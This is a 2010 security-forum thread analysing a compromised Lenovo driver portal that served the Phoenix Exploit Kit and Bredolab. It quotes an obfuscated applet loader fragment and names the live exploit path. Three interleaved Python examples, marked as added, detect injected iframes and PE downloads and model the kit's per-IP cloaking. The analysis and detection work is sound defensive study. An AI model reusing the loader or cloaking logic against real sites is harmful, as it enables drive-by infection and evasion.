Wilders Security Forums > Other Security Topics > other security issues & news
#1 Ocky (Very Frequent Poster), June 20th, 2010, 12:37 PM
Malware (Trojan) found in download portal of Lenovo.

I don't use Lenovo Thinkpads, but I came across this through a German site.
Apparently it's a Java-based trojan downloader and seems to be using (hiding in) an IFrame left by the attacker.
Found this on a German forum: http://www.thinkpad-forum.de/softwar...treibermatrix/ (German)

[Attached screenshot: Trojan Lenovo Download portal.png]

Some of the known download sites affected:

hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-61596.html (R51e)
hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-67100.html (X41 Tablet)
hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-68184.html (Reserve Edition)
hxxp://download.lenovo.com/lenovo/content/ddfm/MIGR-46024.html (R40, R40e)

PS. It appears that Firefox and Chrome warn visitors to the website in question.
#2 Rmus (Exploit Analyst), June 20th, 2010, 08:59 PM
Re: Malware (Trojan) found in download portal of Lenovo.

Yes, it's a well-crafted attack.

Often, the i-frame or script code injection is not the fault of the web site itself; rather, the vulnerability lies in the web hosting server, giving the hacker root access whereby the malicious code can be injected into all of the HTML pages, as shown in your example.

Using IE to watch the pages load, we see the malicious domain being loaded by the I-frame you post:

[Attached screenshot: i-frame_1.gif]

That domain has been taken down, so we can't see how the actual exploit works. Most malicious sites these days have an exploit pack, a group of exploits looking for a vulnerability in the user's system when redirected to the malicious website.


----
rich
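An added example (not code from the thread, from Lenovo or from any of the posters) of the kind of check Rmus's post calls for: parse an HTML page and flag every iframe, script, object or embed whose host is off-site, plus any applet loader, recording whether the element is hidden the way an injected frame usually is. The two sample pages, the host names attacker.invalid and static.lenovo.com, and the function names are constructed for this example; the applet attributes are the ones quoted later in the thread.

```python
"""Flag injected off-site iframes/scripts and applet loaders in HTML (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a driver page of the kind described above, with a hidden
# iframe appended just before </body>. attacker.invalid and static.lenovo.com
# are placeholder hosts for this example.
INFECTED_PAGE = """<html><head><title>MIGR-61596 - ThinkPad R51e</title></head>
<body>
<h1>Drivers and software</h1>
<a href="/lenovo/content/ddfm/MIGR-61596.html">Download matrix</a>
<script src="/js/site.js"></script>
<script src="http://static.lenovo.com/js/analytics.js"></script>
<iframe src="http://attacker.invalid/pek/index.php" width="1" height="1"
        style="visibility:hidden"></iframe>
</body></html>"""

# Constructed sample of a kit landing page: the applet loader quoted in the
# thread, trimmed to the two attributes that matter.
LANDING_PAGE = "<body><applet code='dev.s.Saxonia' archive='tmp/des.jar'></applet></body>"

LOADER_TAGS = ("iframe", "script", "object", "embed", "applet")


class _LoaderCollector(HTMLParser):
    """Collect every tag that can pull code from another location."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag in LOADER_TAGS:
            a = dict(attrs)
            src = a.get("src") or a.get("data") or a.get("archive")
            self.found.append((tag, src, a))


def _is_hidden(attrs):
    """Hidden by CSS, or sized 1x1 or smaller: the usual shape of an injected frame."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    w, h = (attrs.get("width") or "").strip(), (attrs.get("height") or "").strip()
    return w.isdigit() and h.isdigit() and int(w) <= 1 and int(h) <= 1


def find_injected_loaders(html, site_domain):
    """Return loaders that point off-site (not site_domain or a subdomain of it),
    plus every <applet>, which has no business on a driver download page.
    Each finding: {'tag', 'src', 'host', 'hidden'}."""
    parser = _LoaderCollector()
    parser.feed(html)
    findings = []
    for tag, src, attrs in parser.found:
        host = urlparse(src).hostname if src else None
        on_site = host is None or host == site_domain or host.endswith("." + site_domain)
        if tag != "applet" and on_site:
            continue
        findings.append({"tag": tag, "src": src, "host": host, "hidden": _is_hidden(attrs)})
    return findings


if __name__ == "__main__":
    for page in (INFECTED_PAGE, LANDING_PAGE):
        for finding in find_injected_loaders(page, "lenovo.com"):
            print(finding)
```

Run over a mirror of the site's HTML tree, a scan like this turns the "injected into all of the HTML pages" case into a list of files to clean; a same-origin whitelist keeps the site's own script includes out of the output.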
#3 Mornsgrans (Infrequent Poster), June 21st, 2010, 06:05 AM
Re: Malware (Trojan) found in download portal of Lenovo.

Quote:
Originally Posted by Rmus
That domain has been taken down, so we can't see how the actual exploit works.

That domain seems to be up again, as I read a few minutes ago in another forum, but I have not tested it myself.
#4 Bugbatter (Security Expert), June 21st, 2010, 07:30 AM
Re: Malware (Trojan) found in download portal of Lenovo.

According to a source at Lenovo, the malware issue impacts HTML files hosted on download.lenovo.com. Searching for general content (driver EXEs, PDFs, warranty status, IWS, system service parts, etc.) on the lenovo.com domain remains unaffected.
#5 Rmus (Exploit Analyst), June 21st, 2010, 11:34 AM
Re: Malware (Trojan) found in download portal of Lenovo.

Quote:
Originally Posted by Mornsgrans
That domain seems to be up again as i read a few minutes ago in annother forum it but not tested by myself.
Thanks - indeed it is back up, but Lenovo has cleaned up its HTML pages on its Download site. However, we can test the link directly, and at least one of the exploits uses a Java applet, as that forum mentioned:

[Attached screenshot: volgo_1.gif]

This exploit uses "evasive" techniques, so that if an attempt is made to connect another time, the Google Search Page appears:

[Attached screenshot: volgo_2.gif]

Finjan wrote about this several years ago:

Evasive Attacks Cover Their Tracks to Avoid Detection
http://www.finjan.com/Pressrelease.a...Lan=1230&lan=3
Quote:
"Evasive attack techniques where malicious code is controlled per IP address, country of origin or number of visits provide hackers with the ability to minimize the malicious code's exposure, thereby reducing the likelihood of detection. Moreover, evasive attacks can identify the IP addresses of crawlers used by URL filtering, reputation services and search engines, replying to these engines with legitimate content and increasing the chances of mistakenly being classified by them as a legitimate category," said Yuval Ben-Itzhak, CTO, Finjan. "The combination of these evasive attacks with code obfuscation techniques significantly enhances the capability of sophisticated hackers to go undetected."
If you are testing using a dynamic IP address, disconnecting/reconnecting allows loading the site again.

The code is definitely obfuscated (disguised). You can see that it downloads a .JAR (java) file, but the script itself cannot be understood without sophisticated de-obfuscation analysis:

Code:
<body><applet code='dev.s.Saxonia' archive='tmp/des.jar' VALUE='http://volgo - marun . cn /......? <script>var joetf6="d.<i'<ih``=A2F40Joa;=%55%58%43%71%84%35% 0e%ee%8e%56%40%50%89%f0%ee%8c%95%c5%95%08%05%00%08 %05%8e%56%40%50%89%f0%ee%8c%95%c5%95%08%05%00%08% 70%60%ca%3c%b1%81%8c%08%08%08%a0%53%00%ff%ee%20%ac %00%00%00%00%10%ff%83%55%44%76%46%67%06%67s+ %22%66%27%67%9rk6%76%77%66%36%f`vd.lo;t'prc,B-D09r`at2Pa.bhl'r Cjoatp.Epoc.';)(tpy`.eae.;e).e;e)hFnO(ibd'=de<aiel'm`lp''aab'snieScm'aiofi5t <<>i(celIn`dnei&Lexs=r`osej+ttnbo+id6185'sbeu}'}nPa`gpdi'`:nd'.mat (a'06F235EF66e4FE5EF8DD3re500004FB0312A4D67899846EA284399504FF35 F7188A20916892994CFFBD608034741047C2374238C8CD5E001086AA803CE7 yman'doard.h)ri+euw}eosuI)=tE'gri;tplognfrbdo'Pypetcettlowbv>Odewcc88-

I could not get the exploit to run using Opera, even with Java enabled.


----
rich
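An added example, not code from the thread or from any exploit kit: a model of the per-IP "serve the exploit once, then show Google" behaviour Rmus describes above, so a tester can see why a refresh or a second attempt from the same address yields nothing and why a new dynamic address works again. The crawler User-Agent markers, the 192.0.2.0/24 "crawler" range (a documentation range, not a real vendor's) and the request sequence are assumptions constructed for this example.

```python
"""Model of the per-IP 'serve once, then redirect' logic described above (added example)."""
import ipaddress

REDIRECT_TARGET = "http://www.google.com/"
# Assumed: substrings the kit matches against User-Agent to spot crawlers.
CRAWLER_UA_MARKERS = ("googlebot", "bingbot", "slurp", "crawler", "spider")
# Constructed placeholder range standing in for the kit's list of scanner and
# reputation-service source addresses (TEST-NET-1, not a real vendor range).
CRAWLER_NETS = [ipaddress.ip_network("192.0.2.0/24")]


class EvasiveLandingPage:
    """Server-side state: how many times each source IP has been served the exploit."""

    def __init__(self, exploit_html, max_hits_per_ip=1):
        self.exploit_html = exploit_html
        self.max_hits_per_ip = max_hits_per_ip
        self.hits = {}

    def handle(self, ip, user_agent=""):
        """Return ('exploit', html) or ('redirect', url) for one request."""
        addr = ipaddress.ip_address(ip)
        ua = user_agent.lower()
        if any(m in ua for m in CRAWLER_UA_MARKERS) or any(addr in net for net in CRAWLER_NETS):
            return ("redirect", REDIRECT_TARGET)  # crawlers only ever see benign content
        served = self.hits.get(ip, 0)
        if served >= self.max_hits_per_ip:
            return ("redirect", REDIRECT_TARGET)  # repeat visitor: cover tracks
        self.hits[ip] = served + 1
        return ("exploit", self.exploit_html)


def replay(requests, exploit_html="<applet code='dev.s.Saxonia' archive='tmp/des.jar'></applet>"):
    """Feed a list of (ip, user_agent) requests to a fresh kit and return the verdicts."""
    kit = EvasiveLandingPage(exploit_html)
    return [kit.handle(ip, ua)[0] for ip, ua in requests]


# Constructed request sequence mirroring the testing described in the thread:
# an analyst's first hit, a refresh, a search-engine crawler, and the same
# analyst after reconnecting with a new dynamic address.
SAMPLE_REQUESTS = [
    ("203.0.113.7", "Mozilla/5.0 (Windows; U; MSIE 8.0)"),
    ("203.0.113.7", "Mozilla/5.0 (Windows; U; MSIE 8.0)"),
    ("192.0.2.10", "Mozilla/5.0 (compatible; Googlebot/2.1)"),
    ("203.0.113.8", "Mozilla/5.0 (Windows; U; MSIE 8.0)"),
]

if __name__ == "__main__":
    for (ip, ua), verdict in zip(SAMPLE_REQUESTS, replay(SAMPLE_REQUESTS)):
        print(f"{ip:14} {verdict}")
```

The practical consequence for analysis is the one Rmus draws: capture the response on the first request from a fresh address (proxy logs or a packet capture), because a browser refresh will only ever show the decoy.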
#6 CloneRanger (Massive Poster), June 21st, 2010, 12:52 PM
Re: Malware (Trojan) found in download portal of Lenovo.

Very surprised Lenovo got hit; I expect the Chinese to be on the ball. Just shows

Tried several times yesterday with FF and IE but saw nothing but a blank page and no nasty. Today though

[Attached screenshot: vol.gif]

still no nasty etc. I could find.

Wonder how many people got infected, probably not that many ? but still not good.
#7 Rmus (Exploit Analyst), June 21st, 2010, 04:31 PM
Re: Malware (Trojan) found in download portal of Lenovo.

Quote:
Originally Posted by CloneRanger
still no nasty etc i could find.
You won't find the exploit by going to the domain - the cybercriminals use the domain to point directly to the exploit file.

If you are set up to test, you can use the direct URL shown in the i-frame in the screenshot in the first post.

----
rich
#8 CloneRanger (Massive Poster), June 21st, 2010, 05:48 PM
Re: Malware (Trojan) found in download portal of Lenovo.

@Rmus

Hi, couldn't see/find anything on there last time, even in the source? However, when I added /pek/index.php onto the www I got all this on the page

[Attached screenshot: v1.gif]

Allowed Scripting and the Java etc. box disappeared. Don't have/want Java though. Refreshed the page and I got a redirect attempt to Google. Tried various attempts to go back, with/without Scripting/iframe, but just got time-outs after about 1-2 minutes. Even using proxies with both www's resulted in the same outcome. Maybe they actively monitor their www for repeated polling etc., and then block?

If I had managed to grab something I would have passed it on to vendors and VT etc., as I wasn't planning on running it.
#9 Rmus (Exploit Analyst), June 21st, 2010, 10:09 PM
Re: Malware (Trojan) found in download portal of Lenovo.

That URL is no longer loading the Java Applet. Search for
Code:
dev.s.Saxonia
and you will see that it is part of the exploit -- it's been around for a month or so in various guises and redirection exploits.

Quote:
Originally Posted by CloneRanger
Refreshed the page and i got a redirect attempt to Google... Maybe they actively monitor their www for repeated polling etc, and then block ?
See my comments in Post #5 about evasive techniques.

----
rich
#10 CloneRanger (Massive Poster), June 22nd, 2010, 04:03 AM
Re: Malware (Trojan) found in download portal of Lenovo.

@Rmus

Got the source page this time, and sure enough, just like you said, dev.s.Saxonia is there. Also saw tmp/des.jar

[Attached screenshot: dev.gif]

Inputted into the very useful http://jsunpack.jeek.org/dec/go and got

[Attached screenshot: js.gif]

DL'd the Zip

[Attached screenshot: av.gif]

As you say

Quote:
it's been around for a month or so in various guises and redirection exploits

Also noticed in there

[Attached screenshot: reg.gif]

Thought you might be interested in the PDF exploits and Drivebys from there

[Attached screenshot: nort.gif]

Viruses Threats found: 8

Drive-By Downloads Threats found: 6

http://safeweb.norton.com/report/sho...egistr3red.com


Quote:
See my comments in Post #5 about evasive techniques.


Quite right, Sir. Good thing I'm not one of your students, otherwise detention for me. I could think of a lot worse places for it than sunny CA, though. Lucky you.
#11 Ocky (Very Frequent Poster), June 22nd, 2010, 04:29 AM
Re: Malware (Trojan) found in download portal of Lenovo.

Malicious code on Lenovo driver download page - Update

Quote:
Update: It now seems that the dropper was the Phoenix Kit and that once activated it downloaded the Bredolab trojan. Lenovo appears to have now removed the iframe from the affected web pages.
#12 Rmus (Exploit Analyst), June 22nd, 2010, 11:04 AM
Re: Malware (Trojan) found in download portal of Lenovo.

Quote:
Originally Posted by CloneRanger
@Rmus

Got the source page this time and sure enough just like you said dev.s.Saxonia is there. Also saw tmp/des.jar

Inputted into the very useful http://jsunpack.jeek.org/dec/go
This is a great tool for analysis. Thanks for posting.

Quote:
Thought you might be interested in the PDF exploits and Drivebys from there
As you (and Ocky) discovered, the exploit uses an Exploit Pack, or Kit, which is very popular these days, as I mentioned in Post #2 above. The Kit comes with pre-packaged exploits targeting common vulnerabilities, both patched and non-patched. The list of exploits will change as new vulnerabilities in applications are discovered, PDF being quite useful these days!

The cybercriminal purchases the Kit and sets up a web site (volgo-marun and registr3red in this case). The cybercriminals will have the exploit download the malware executable of their choice. Then, it's just a matter of using web tools to search around for vulnerable web servers in order to inject a malicious i-frame or script (SQL injection being very popular) that redirects the victim to the malicious web site that hosts the exploit kit.

You may remember we discussed exploit kits in the Blade-Defender thread. For those who missed that, I posted a summary/description of some of the kits:

http://www.wilderssecurity.com/showt...04#post1630504

As I pointed out, these types of attacks are really easy to prevent, since all of the exploits have one goal in mind: download a trojan executable. There are so many solutions these days to block this, so it's just a matter of getting the word out to all of your friends/acquaintances and help them set up suitable protection!

----
rich
#13 Ocky (Very Frequent Poster), June 22nd, 2010, 01:45 PM
Re: Malware (Trojan) found in download portal of Lenovo.

Just to say thanks, Rmus, for the very instructive postings and thanks to CloneRanger for digging deep.
#14 CloneRanger (Massive Poster), June 22nd, 2010, 02:27 PM
Re: Malware (Trojan) found in download portal of Lenovo.

@Rmus

Quote:
This is a great tool for analysis. Thanks for posting.

Glad you like it, and I hope it proves very useful to you from now on. I only discovered it by accident yesterday as I was searching for info etc. on registr3red.com etc.

They are still at it today with more live nasties,

[Attached screenshot: vol.gif]

I DL'd 2 from slightly different www's

[Attached screenshot: exeup.gif]

exe.exe = update.exe = Trojan Bredolab

Only 2 show on VT for both = same nasty, different name.

PEXK open and waiting

[Attached screenshot: pex.gif]

Quote:
You may remember we discussed exploit kits in the Blade-Defender thread.

Yes indeed, and definitely worth checking out for those that haven't. Still no sign of Blade-Defender as of yet. Maybe it's a case of "all good things come to those that wait".

Quote:
There are so many solutions these days to block this, so it's just a matter of getting the word out to all of your friends/acquaintances and help them set up suitable protection!

Yep, word up

@Ocky

Quote:
Just to say thanks, Rmus, for the very instructive postings and thanks to CloneRanger for digging deep.

You're very welcome, but Rmus is the expert, not me. I just tinker here and there and do whatever I can.

Thanks for the Update: Confirmed above.
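An added example, not code from the thread or from any of the posters, tying together Rmus's point in post #12 (every exploit in the kit ends in downloading a trojan executable, so that is the step to block) and CloneRanger's observation just above that exe.exe and update.exe are the same file under two names. It inspects a response body for a Windows PE header regardless of file name or declared Content-Type, flags a body that is an executable but claims otherwise, and groups bodies by SHA-256 so renamed copies collapse to one entry. The hosts kit-a.invalid, kit-b.invalid and example.invalid, the fake PE bytes and the response list are constructed for this example and correspond to no real sample.

```python
"""Catch a dropped Windows executable by content, not by name or declared type (added example)."""
import hashlib
import struct


def is_pe_executable(data):
    """True if data carries a DOS 'MZ' stub whose e_lfanew field points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Declared types under which an executable download is at least honest about itself.
EXE_TYPES = ("application/octet-stream", "application/x-msdownload", "application/x-msdos-program")


def inspect_download(url, content_type, body):
    """Classify one response: is it a PE file, does its declared type admit that, and what is its hash."""
    pe = is_pe_executable(body)
    declared = content_type.split(";")[0].strip().lower()
    return {
        "url": url,
        "is_pe": pe,
        "type_mismatch": pe and declared not in EXE_TYPES,
        "sha256": hashlib.sha256(body).hexdigest(),
    }


def group_by_hash(results):
    """Map sha256 -> list of URLs, so one payload served under several names collapses to one entry."""
    groups = {}
    for r in results:
        groups.setdefault(r["sha256"], []).append(r["url"])
    return groups


def _fake_pe():
    """Constructed stand-in for a payload: a 64-byte DOS header with e_lfanew = 0x40,
    then a PE signature and filler. It is not runnable and matches no real sample."""
    dos = bytearray(b"MZ" + b"\x00" * 62)
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + b"\x00" * 20


# Constructed responses: the same bytes fetched as exe.exe and as update.exe from two
# placeholder hosts (one lying about its type), plus an ordinary PDF for contrast.
SAMPLE_RESPONSES = [
    ("http://kit-a.invalid/pek/exe.exe", "application/octet-stream", _fake_pe()),
    ("http://kit-b.invalid/update.exe", "image/gif", _fake_pe()),
    ("http://example.invalid/readme.pdf", "application/pdf", b"%PDF-1.4\n1 0 obj\n"),
]


def triage(responses=SAMPLE_RESPONSES):
    """Inspect every response and return (per-response results, hash -> URLs)."""
    results = [inspect_download(u, t, b) for u, t, b in responses]
    return results, group_by_hash(results)


if __name__ == "__main__":
    results, groups = triage()
    for r in results:
        flags = ("PE" if r["is_pe"] else "not PE") + (", type mismatch" if r["type_mismatch"] else "")
        print(r["url"], flags)
    for digest, urls in groups.items():
        if len(urls) > 1:
            print("same payload:", digest[:16], urls)
```

A gateway or proxy that applies the PE check to every response body, rather than trusting the extension or Content-Type, blocks the download step that all of the kit's exploits share, which is the "one goal in mind" Rmus describes; the hash grouping is what lets two submissions under different names be recognised as one sample before they go to VT.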
#15 Rmus (Exploit Analyst), June 22nd, 2010, 11:42 PM
Re: Malware (Trojan) found in download portal of Lenovo.

Quote:
Originally Posted by CloneRanger
PEXK open and waiting
So, pek in the URL stands for Phoenix Exploit Kit? Very interesting!

Quote:
Originally Posted by Ocky
Just to say thanks, Rmus, for the very instructive postings and thanks to CloneRanger for digging deep.
You are welcome, and yes, he has done some deep digging here!

----
rich
 

Powered by vBulletin® Copyright ©2000 - 2013, Jelsoft Enterprises Ltd.
Copyright ©2002 - 2013, Wilders Security Forums